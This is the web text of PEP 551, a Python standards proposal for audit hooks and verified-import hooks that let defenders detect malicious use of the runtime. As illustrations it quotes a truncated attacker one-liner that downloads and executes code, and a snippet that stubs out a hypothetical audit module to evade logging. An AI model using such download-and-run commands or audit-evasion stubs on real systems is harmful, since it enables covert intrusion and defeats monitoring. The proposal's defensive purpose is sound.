Notice: While Javascript is not essential for this website, your interaction with the content will be limited. Please turn Javascript on for the full experience.

PEP 551 -- Security transparency in the Python runtime

Title:Security transparency in the Python runtime
Author:Steve Dower <steve.dower at>
Type:Standards Track
Post-History:24-Aug-2017 (security-sig), 28-Aug-2017 (python-dev)


This PEP describes additions to the Python API and specific behaviors for the CPython implementation that make actions taken by the Python runtime visible to security and auditing tools. The goals in order of increasing importance are to prevent malicious use of Python, to detect and report on malicious use, and most importantly to detect attempts to bypass detection. Most of the responsibility for implementation is required from users, who must customize and build Python for their own environment.

We propose two small sets of public APIs to enable users to reliably build their copy of Python without having to modify the core runtime, protecting future maintainability. We also discuss recommendations for users to help them develop and configure their copy of Python.


Software vulnerabilities are generally seen as bugs that enable remote or elevated code execution. However, in our modern connected world, the more dangerous vulnerabilities are those that enable advanced persistent threats (APTs). APTs are achieved when an attacker is able to penetrate a network, establish their software on one or more machines, and over time extract data or intelligence. Some APTs may make themselves known by maliciously damaging data (e.g., WannaCrypt) or hardware (e.g., Stuxnet). Most attempt to hide their existence and avoid detection. APTs often use a combination of traditional vulnerabilities, social engineering, phishing (or spear-phishing), thorough network analysis, and an understanding of misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require special privileges. For example, an APT that is established as a non-administrative user on a developer’s machine may have the ability to spread to production machines through normal deployment channels. It is common for APTs to persist on as many machines as possible, with sheer weight of presence making them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their tracks, the biggest barrier to detection is a lack of insight. System administrators with large networks rely on distributed logs to understand what their machines are doing, but logs are often filtered to show only error conditions. APTs that are attempting to avoid detection will rarely generate errors or abnormal events. Reviewing normal operation logs involves a significant amount of effort, though work is underway by a number of companies to enable automatic anomaly detection within operational logs. The tools preferred by attackers are ones that are already installed on the target machines, since log messages from these tools are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the existence of APTs or methods and mitigations that do not apply to this PEP. For further information about the field, we recommend reading or watching the resources listed under Further Reading.

Python is a particularly interesting tool for attackers due to its prevalence on server and developer machines, its ability to execute arbitrary code provided as data (as opposed to native binaries), and its complete lack of internal auditing. This allows attackers to download, decrypt, and execute malicious code with a single command:

python -c "import urllib.request, base64;

This command currently bypasses most anti-malware scanners that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload).

General consensus among the security community is that totally preventing attacks is infeasible and defenders should assume that they will often detect attacks only after they have succeeded. This is known as the "assume breach" mindset. [1] In this scenario, protections such as sandboxing and input validation have already failed, and the important task is detection, tracking, and eventual removal of the malicious code. To this end, the primary feature required from Python is security transparency: the ability to see what operations the Python runtime is performing that may indicate anomalous or malicious use. Preventing such use is valuable, but secondary to the need to know that it is occurring.

To summarise the goals in order of increasing importance:

  • preventing malicious use is valuable
  • detecting malicious use is important
  • detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is PowerShell, which has recently been enhanced towards similar goals of transparency and prevention. [2]

Generally, application and system configuration will determine which events within a scripting engine are worth logging. However, given the value of many logs events are not recognized until after an attack is detected, it is important to capture as much as possible and filter views rather than filtering at the source (see the No Easy Breach video from Further Reading). Events that are always of interest include attempts to bypass auditing, attempts to load and execute code that is not correctly signed or access-controlled, use of uncommon operating system functionality such as debugging or inter-process inspection tools, most network access and DNS resolution, and attempts to create and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in order to detect abnormal or malicious usage. Currently, the Python runtime does not provide any ability to do this, which (anecdotally) has led to organizations switching to other languages. The aim of this PEP is to enable system administrators to deploy a security transparent copy of Python that can integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

  • Script Block Logging [3]
  • DeviceGuard [4]
  • AMSI [5]
  • Persistent Zone Identifiers [6]
  • Event tracing (which includes event forwarding) [7]

On Linux, some specific features that may be integrated are:

  • gnupg [8]
  • sd_journal [9]
  • OpenBSM [10]
  • syslog [11]
  • auditd [12]
  • SELinux labels [13]
  • check execute bit on imported modules

On macOS, some features that may be used with the expanded APIs are:

Overall, the ability to enable these platform-specific features on production machines is highly appealing to system administrators and will make Python a more trustworthy dependency for application developers.

Overview of Changes

True security transparency is not fully achievable by Python in isolation. The runtime can audit as many events as it likes, but unless the logs are reviewed and analyzed there is no value. Python may impose restrictions in the name of security, but usability may suffer. Different platforms and environments will require different implementations of certain security features, and organizations with the resources to fully customize their runtime should be encouraged to do so.

The aim of these changes is to enable system administrators to integrate Python into their existing security systems, without dictating what those systems look like or how they should behave. We propose two API changes to enable this: an Audit Hook and Verified Open Hook. Both are not set by default, and both require modifications to the entry point binary to enable any functionality. For the purposes of validation and example, we propose a new spython/spython.exe entry point program that enables some basic functionality using these hooks. However, security-conscious organizations are expected to create their own entry points to meet their own needs.

Audit Hook

In order to achieve security transparency, an API is required to raise messages from within certain operations. These operations are typically deep within the Python runtime or standard library, such as dynamic code compilation, module imports, DNS resolution, or use of certain modules such as ctypes.

The new C APIs required for audit hooks are:

# Add an auditing hook
typedef int (*hook_func)(const char *event, PyObject *args,
                         void *userData);
int PySys_AddAuditHook(hook_func hook, void *userData);

# Raise an event with all auditing hooks
int PySys_Audit(const char *event, PyObject *args);

# Internal API used during Py_Finalize() - not publicly accessible
void _Py_ClearAuditHooks(void);

The new Python APIs for audit hooks are:

# Add an auditing hook
sys.addaudithook(hook: Callable[str, tuple]) -> None

# Raise an event with all auditing hooks
sys.audit(str, *args) -> None

Hooks are added by calling PySys_AddAuditHook() from C at any time, including before Py_Initialize(), or by calling sys.addaudithook() from Python code. Hooks are never removed or replaced, and existing hooks have an opportunity to refuse to allow new hooks to be added (adding an audit hook is audited, and so preexisting hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call PySys_Audit() from C (while the GIL is held) or sys.audit(). The string argument is the name of the event, and the tuple contains arguments. A given event name should have a fixed schema for arguments, and both arguments are considered a public API (for a given x.y version of Python), and thus should only change between feature releases with updated documentation.

When an event is audited, each hook is called in the order it was added with the event name and tuple. If any hook returns with an exception set, later hooks are ignored and in general the Python runtime should terminate. This is intentional to allow hook implementations to decide how to respond to any particular event. The typical responses will be to log the event, abort the operation with an exception, or to immediately terminate the process with an operating system exit call.

When an event is audited but no hooks have been set, the audit() function should include minimal overhead. Ideally, each argument is a reference to existing data rather than a value calculated just for the auditing call.

As hooks may be Python objects, they need to be freed during Py_Finalize(). To do this, we add an internal API _Py_ClearAuditHooks() that releases any PyObject* hooks that are held, as well as any heap memory used. This is an internal function with no public export, but it triggers an event for all audit hooks to ensure that unexpected calls are logged.

See Audit Hook Locations for proposed audit hook points and schemas, and the Recommendations section for discussion on appropriate responses.

Verified Open Hook

Most operating systems have a mechanism to distinguish between files that can be executed and those that can not. For example, this may be an execute bit in the permissions field, or a verified hash of the file contents to detect potential code tampering. These are an important security mechanism for preventing execution of data or code that is not approved for a given environment. Currently, Python has no way to integrate with these when launching scripts or importing modules.

The new public C API for the verified open hook is:

# Set the handler
typedef PyObject *(*hook_func)(PyObject *path)
int PyImport_SetOpenForImportHook(void *handler)

# Open a file using the handler
PyObject *PyImport_OpenForImport(const char *path)

The new public Python API for the verified open hook is:

# Open a file using the handler

The _imp.open_for_import() function is a drop-in replacement for open(str(pathlike), 'rb'). Its default behaviour is to open a file for raw, binary access - any more restrictive behaviour requires the use of a custom handler. Only str arguments are accepted.

A custom handler may be set by calling PyImport_SetOpenForImportHook() from C at any time, including before Py_Initialize(). However, if a hook has already been set then the call will fail. When open_for_import() is called with a hook set, the hook will be passed the path and its return value will be returned directly. The returned object should be an open file-like object that supports reading raw bytes. This is explicitly intended to allow a BytesIO instance if the open handler has already had to read the file into memory in order to perform whatever verification is necessary to determine whether the content is permitted to be executed.

Note that these hooks can import and call the function on CPython without triggering themselves.

If the hook determines that the file is not suitable for execution, it should raise an exception of its choice, as well as raising any other auditing events or notifications.

All import and execution functionality involving code from a file will be changed to use open_for_import() unconditionally. It is important to note that calls to compile(), exec() and eval() do not go through this function - an audit hook that includes the code from these calls will be added and is the best opportunity to validate code that is read from the file. Given the current decoupling between import and execution in Python, most imported code will go through both open_for_import() and the log hook for compile, and so care should be taken to avoid repeating verification steps.


The use of open_for_import() by importlib is a valuable first defence, but should not be relied upon to prevent misuse. In particular, it is easy to monkeypatch importlib in order to bypass the call. Auditing hooks are the primary way to achieve security transparency, and are essential for detecting attempts to bypass other functionality.

API Availability

While all the functions added here are considered public and stable API, the behavior of the functions is implementation specific. The descriptions here refer to the CPython implementation, and while other implementations should provide the functions, there is no requirement that they behave the same.

For example, sys.addaudithook() and sys.audit() should exist but may do nothing. This allows code to make calls to sys.audit() without having to test for existence, but it should not assume that its call will have any effect. (Including existence tests in security-critical code allows another vector to bypass auditing, so it is preferable that the function always exist.)

_imp.open_for_import(path) should at a minimum always return, 'rb'). Code using the function should make no further assumptions about what may occur, and implementations other than CPython are not required to let developers override the behavior of this function with a hook.

Audit Hook Locations

Calls to sys.audit() or PySys_Audit() will be added to the following operations with the schema in Table 1. Unless otherwise specified, the ability for audit hooks to abort any listed operation should be considered part of the rationale for including the hook.

Table 1: Audit Hooks
API Function Event Name Arguments Rationale
PySys_AddAuditHook sys.addaudithook   Detect when new audit hooks are being added.
_PySys_ClearAuditHooks sys._clearaudithooks   Notifies hooks they are being cleaned up, mainly in case the event is triggered unexpectedly. This event cannot be aborted.
PyImport_SetOpenForImportHook setopenforimporthook   Detects any attempt to set the open_for_import hook.
compile, exec, eval, PyAst_CompileString, PyAST_obj2mod compile (code, filename_or_none) Detect dynamic code compilation, where code could be a string or AST. Note that this will be called for regular imports of source code, including those that were opened with open_for_import.
exec, eval, run_mod exec (code_object,) Detect dynamic execution of code objects. This only occurs for explicit calls, and is not raised for normal function invocation.
import import (module, filename, sys.path, sys.meta_path, sys.path_hooks) Detect when modules are imported. This is raised before the module name is resolved to a file. All arguments other than the module name may be None if they are not used or available.
code_new code.__new__ (bytecode, filename, name) Detect dynamic creation of code objects. This only occurs for direct instantiation, and is not raised for normal compilation.
func_new_impl function.__new__ (code,) Detect dynamic creation of function objects. This only occurs for direct instantiation, and is not raised for normal compilation.
_ctypes.dlopen, _ctypes.LoadLibrary ctypes.dlopen (module_or_path,) Detect when native modules are used.
_ctypes._FuncPtr ctypes.dlsym (lib_object, name) Collect information about specific symbols retrieved from native modules.
_ctypes._CData ctypes.cdata (ptr_as_int,) Detect when code is accessing arbitrary memory using ctypes.
id id (id_as_int,) Detect when code is accessing the id of objects, which in CPython reveals information about memory layout.
sys._getframe sys._getframe (frame_object,) Detect when code is accessing frames directly.
sys._current_frames sys._current_frames   Detect when code is accessing frames directly.
PyEval_SetProfile sys.setprofile   Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that threading.setprofile eventually calls this function, so the event will be audited for each thread.
PyEval_SetTrace sys.settrace   Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that threading.settrace eventually calls this function, so the event will be audited for each thread.
_PyEval_SetAsyncGenFirstiter sys.set_async_gen_firstiter   Detect changes to async generator hooks.
_PyEval_SetAsyncGenFinalizer sys.set_async_gen_finalizer   Detect changes to async generator hooks.
_PyEval_SetCoroutineWrapper sys.set_coroutine_wrapper   Detect changes to the coroutine wrapper.
socket.bind, socket.connect, socket.connect_ex, socket.getaddrinfo, socket.getnameinfo, socket.sendmsg, socket.sendto socket.address (address,) Detect access to network resources. The address is unmodified from the original call.
socket.__init__ socket() (family, type, proto) Detect creation of sockets. The arguments will be int values.
socket.gethostname socket.gethostname   Detect attempts to retrieve the current host name.
socket.sethostname socket.sethostname (name,) Detect attempts to change the current host name. The name argument is passed as a bytes object.
socket.gethostbyname, socket.gethostbyname_ex      
socket.gethostbyname (name,) Detect host name resolution. The name argument is a str or bytes object.  
socket.gethostbyaddr socket.gethostbyaddr (address,) Detect host resolution. The address argument is a str or bytes object.
socket.getservbyname socket.getservbyname (name, protocol) Detect service resolution. The arguments are str objects.
socket.getservbyport socket.getservbyport (port, protocol) Detect service resolution. The port argument is an int and protocol is a str.
member_get, func_get_code, func_get_[kw]defaults object.__getattr__ (object, attr) Detect access to restricted attributes. This event is raised for any built-in members that are marked as restricted, and members that may allow bypassing imports.
_PyObject_GenericSetAttr, check_set_special_type_attr, object_set_class, func_set_code, func_set_[kw]defaults object.__setattr__ (object, attr, value) Detect monkey patching of types and objects. This event is raised for the __class__ attribute and any attribute on type objects.
_PyObject_GenericSetAttr object.__delattr__ (object, attr) Detect deletion of object attributes. This event is raised for any attribute on type objects.
Unpickler.find_class pickle.find_class (module_name, global_name) Detect imports and global name lookup when unpickling.
array_new array.__new__ (typecode, initial_value) Detects creation of array objects.

TODO - more hooks in _socket, _ssl, others?

SPython Entry Point

A new entry point binary will be added, called spython.exe on Windows and spythonX.Y on other platforms. This entry point is intended primarily as an example, as we expect most users of this functionality to implement their own entry point and hooks (see Recommendations). It will also be used for tests.

Source builds will build spython by default, but distributions should not include it except as a test binary. The managed binary distributions will not include spython.

Do not accept most command-line arguments

The spython entry point requires a script file be passed as the first argument, and does not allow any options. This prevents arbitrary code execution from in-memory data or non-script files (such as pickles, which can be executed using -m pickle <path>.

Options -B (do not write bytecode), -E (ignore environment variables) and -s (no user site) are assumed.

If a file with the same full path as the process with a ._pth suffix (spython._pth on Windows, spythonX.Y._pth on Linux) exists, it will be used to initialize sys.path following the rules currently described for Windows.

When built with Py_DEBUG, the spython entry point will allow a -i option with no other arguments to enter into interactive mode, with audit messages being written to standard error rather than a file. This is intended for testing and debugging only.

Log security events to a file

Before initialization, spython will set an audit hook that writes events to a local file. By default, this file is the full path of the process with a .log suffix, but may be overridden with the SPYTHONLOG environment variable (despite such overrides being explicitly discouraged in Recommendations).

The audit hook will also abort all sys.addaudithook events, preventing any other hooks from being added.

Restrict importable modules

Also before initialization, spython will set an open-for-import hook that validates all files opened with os.open_for_import. This implementation will require all files to have a .py suffix (thereby blocking the use of cached bytecode), and will raise a custom audit event spython.open_for_import containing (filename, True_if_allowed).

On Windows, the hook will also open the file with flags that prevent any other process from opening it with write access, which allows the hook to perform additional validation on the contents with confidence that it will not be modified between the check and use. Compilation will later trigger a compile event, so there is no need to read the contents now for AMSI, but other validation mechanisms such as DeviceGuard [4] should be performed here.

Restrict globals in pickles

The spython entry point will abort all pickle.find_class events that use the default implementation. Overrides will not raise audit events unless explicitly added, and so they will continue to be allowed.

Performance Impact

The important performance impact is the case where events are being raised but there are no hooks attached. This is the unavoidable case - once a distributor or sysadmin begins adding audit hooks they have explicitly chosen to trade performance for functionality. Performance impact using spython or with hooks added are not of interest here, since this is considered opt-in functionality.

Analysis using the performance tool shows no significant impact, with the vast majority of benchmarks showing between 1.05x faster to 1.05x slower.

In our opinion, the performance impact of the set of auditing points described in this PEP is negligible.


Specific recommendations are difficult to make, as the ideal configuration for any environment will depend on the user's ability to manage, monitor, and respond to activity on their own network. However, many of the proposals here do not appear to be of value without deeper illustration. This section provides recommendations using the terms should (or should not), indicating that we consider it dangerous to ignore the advice, and may, indicating that for the advice ought to be considered for high value systems. The term sysadmins refers to whoever is responsible for deploying Python throughout your network; different organizations may have an alternative title for the responsible people.

Sysadmins should build their own entry point, likely starting from the spython source, and directly interface with the security systems available in their environment. The more tightly integrated, the less likely a vulnerability will be found allowing an attacker to bypass those systems. In particular, the entry point should not obtain any settings from the current environment, such as environment variables, unless those settings are otherwise protected from modification.

Audit messages should not be written to a local file. The spython entry point does this for example and testing purposes. On production machines, tools such as ETW [7] or auditd [12] that are intended for this purpose should be used.

The default python entry point should not be deployed to production machines, but could be given to developers to use and test Python on non-production machines. Sysadmins may consider deploying a less restrictive version of their entry point to developer machines, since any system connected to your network is a potential target. Sysadmins may deploy their own entry point as python to obscure the fact that extra auditing is being included.

Python deployments should be made read-only using any available platform functionality after deployment and during use.

On platforms that support it, sysadmins should include signatures for every file in a Python deployment, ideally verified using a private certificate. For example, Windows supports embedding signatures in executable files and using catalogs for others, and can use DeviceGuard [4] to validate signatures either automatically or using an open_for_import hook.

Sysadmins should log as many audited events as possible, and should copy logs off of local machines frequently. Even if logs are not being constantly monitored for suspicious activity, once an attack is detected it is too late to enable auditing. Audit hooks should not attempt to preemptively filter events, as even benign events are useful when analyzing the progress of an attack. (Watch the "No Easy Breach" video under Further Reading for a deeper look at this side of things.)

Most actions should not be aborted if they could ever occur during normal use or if preventing them will encourage attackers to work around them. As described earlier, awareness is a higher priority than prevention. Sysadmins may audit their Python code and abort operations that are known to never be used deliberately.

Audit hooks should write events to logs before attempting to abort. As discussed earlier, it is more important to record malicious actions than to prevent them.

Sysadmins should identify correlations between events, as a change to correlated events may indicate misuse. For example, module imports will typically trigger the import auditing event, followed by an open_for_import call and usually a compile event. Attempts to bypass auditing will often suppress some but not all of these events. So if the log contains import events but not compile events, investigation may be necessary.

The first audit hook should be set in C code before Py_Initialize is called, and that hook should unconditionally abort the sys.addloghook event. The Python interface is primarily intended for testing and development.

To prevent audit hooks being added on non-production machines, an entry point may add an audit hook that aborts the sys.addloghook event but otherwise does nothing.

On production machines, a non-validating open_for_import hook may be set in C code before Py_Initialize is called. This prevents later code from overriding the hook, however, logging the setopenforexecutehandler event is useful since no code should ever need to call it. Using at least the sample open_for_import hook implementation from spython is recommended.

Since importlib's use of open_for_import may be easily bypassed with monkeypatching, an audit hook should be used to detect attribute changes on type objects.

[TODO: more good advice; less bad advice]

Rejected Ideas

Separate module for audit hooks

The proposal is to add a new module for audit hooks, hypothetically audit. This would separate the API and implementation from the sys module, and allow naming the C functions PyAudit_AddHook and PyAudit_Audit rather than the current variations.

Any such module would need to be a built-in module that is guaranteed to always be present. The nature of these hooks is that they must be callable without condition, as any conditional imports or calls provide more opportunities to intercept and suppress or modify events.

Given its nature as one of the most core modules, the sys module is somewhat protected against module shadowing attacks. Replacing sys with a sufficiently functional module that the application can still run is a much more complicated task than replacing a module with only one function of interest. An attacker that has the ability to shadow the sys module is already capable of running arbitrary code from files, whereas an audit module can be replaced with a single statement:

import sys; sys.modules['audit'] = type('audit', (object,),
    {'audit': lambda *a: None, 'addhook': lambda *a: None})

Multiple layers of protection already exist for monkey patching attacks against either sys or audit, but assignments or insertions to sys.modules are not audited.

This idea is rejected because it makes substituting audit calls throughout all callers near trivial.

Flag in sys.flags to indicate "secure" mode

The proposal is to add a value in sys.flags to indicate when Python is running in a "secure" mode. This would allow applications to detect when some features are enabled and modify their behaviour appropriately.

Currently there are no guarantees made about security by this PEP - this section is the first time the word "secure" has been used. Security transparency does not result in any changed behaviour, so there is no appropriate reason for applications to modify their behaviour.

Both application-level APIs sys.audit and _imp.open_for_import are always present and functional, regardless of whether the regular python entry point or some alternative entry point is used. Callers cannot determine whether any hooks have been added (except by performing side-channel analysis), nor do they need to. The calls should be fast enough that callers do not need to avoid them, and the sysadmin is responsible for ensuring their added hooks are fast enough to not affect application performance.

The argument that this is "security by obscurity" is valid, but irrelevant. Security by obscurity is only an issue when there are no other protective mechanisms; obscurity as the first step in avoiding attack is strongly recommended (see this article for discussion).

This idea is rejected because there are no appropriate reasons for an application to change its behaviour based on whether these APIs are in use.

Further Reading

Redefining Malware: When Old Terms Pose New Threats

By Aviv Raff for SecurityWeek, 29th January 2014

This article, and those linked by it, are high-level summaries of the rise of APTs and the differences from "traditional" malware.

Anatomy of a Cyber Attack

By FireEye, accessed 23rd August 2017

A summary of the techniques used by APTs, and links to a number of relevant whitepapers.

Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection

By Aviv Raff for SecurityWeek, 8th May 2014

High-level summary of the value of detailed logging and automatic analysis.

No Easy Breach: Challenges and Lessons Learned from an Epic Investigation

Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016

Detailed walkthrough of the processes and tools used in detecting and removing an APT.

Disrupting Nation State Hackers

Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

Good security practices, capabilities and recommendations from the chief of NSA's Tailored Access Operation.


Thanks to all the people from Microsoft involved in helping make the Python runtime safer for production use, and especially to James Powell for doing much of the initial research, analysis and implementation, Lee Holmes for invaluable insights into the info-sec field and PowerShell's responses, and Brett Cannon for the restraining and grounding discussions.